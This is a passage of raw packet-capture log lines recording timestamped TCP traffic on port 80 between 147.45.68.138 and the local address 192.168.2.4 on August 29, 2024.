                                                      Aug 29, 2024 22:52:22.350989103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351012945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351027012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351028919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.351037025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351049900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351052999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.351062059 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.351063013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351083994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.351094961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.351190090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351200104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351212025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351221085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.351231098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.351241112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.351268053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.355870008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.355937958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.355940104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.355950117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.355977058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.355984926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.355995893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.356000900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.356021881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.356026888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.356035948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.356050968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.356060982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.356096983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359483004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359493971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359503984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359514952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359527111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359535933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359539032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359553099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359580994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359622002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359651089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359651089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359663963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359668970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359671116 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359679937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359692097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359703064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359704018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359714985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359724998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359724998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359739065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359749079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359750986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359767914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359775066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359781981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.359800100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359817028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.359824896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.390777111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.390983105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391012907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391025066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391035080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391063929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391067982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391067982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391082048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391088963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391093969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391103029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391103029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391107082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391119957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391130924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391130924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391139984 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391143084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391155958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391166925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391170025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391176939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391179085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391190052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391201019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391211033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391222000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391223907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391223907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391237974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391251087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391273975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391447067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391458988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.391488075 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.391513109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.433217049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433293104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.433403015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433418989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433429956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433439970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433445930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433445930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.433458090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433468103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.433470964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433482885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433492899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.433494091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433507919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433511972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.433514118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433525085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433536053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.433537006 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.433569908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434258938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434269905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434279919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434293985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434293985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434326887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434375048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434387922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434398890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434411049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434416056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434425116 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434432983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434448957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434458971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434465885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434477091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434488058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434498072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434499025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434504032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434523106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434526920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434540987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434551954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434551954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.434559107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434572935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.434595108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.435992956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436033010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436180115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436188936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436194897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436204910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436216116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436227083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436228991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436235905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436254978 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436254978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436268091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436278105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436278105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436285973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436292887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436304092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436304092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436317921 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436319113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436331987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436340094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436342955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.436348915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.436377048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437416077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437427998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437438965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437452078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437478065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437499046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437510014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437519073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437536955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437544107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437556028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437556982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437567949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437578917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437582016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437591076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437611103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437639952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437661886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437673092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437683105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437704086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437715054 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437724113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437736034 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437736034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437747002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437750101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437762976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437772036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437774897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437802076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437808990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.437818050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.437856913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.442493916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.442550898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.442599058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.442610979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.442615986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.442625046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.442636013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.442646980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.442650080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.442658901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.442672014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.442706108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.445941925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446053028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446072102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446082115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446096897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446109056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446113110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446134090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446136951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446146965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446147919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446165085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446170092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446177959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446187973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446190119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446202993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446216106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446229935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446238995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446252108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446259975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446260929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446285963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446291924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446302891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446310043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446314096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446326971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446336031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446338892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446350098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446361065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446365118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446378946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446392059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446392059 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446403027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.446410894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.446432114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501176119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501199007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501209021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501220942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501246929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501252890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501270056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501279116 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501282930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501295090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501295090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501306057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501317978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501327991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501327991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501342058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501354933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501368999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501394987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501395941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501409054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501419067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501430035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501431942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501441956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501452923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501454115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501462936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501466990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501478910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.501490116 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.501508951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.520163059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520226002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.520256996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520268917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520304918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.520378113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520389080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520399094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520411015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520418882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.520422935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520433903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520441055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.520446062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520456076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520462036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.520468950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520484924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520490885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.520499945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520504951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.520510912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.520524979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.520544052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.521199942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.521212101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.521223068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.521245956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.521271944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.521332979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.521343946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.521353960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.521365881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.521379948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.521404028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.522763968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.522780895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.522793055 CEST8049739147.45.68.138192.168.2.4
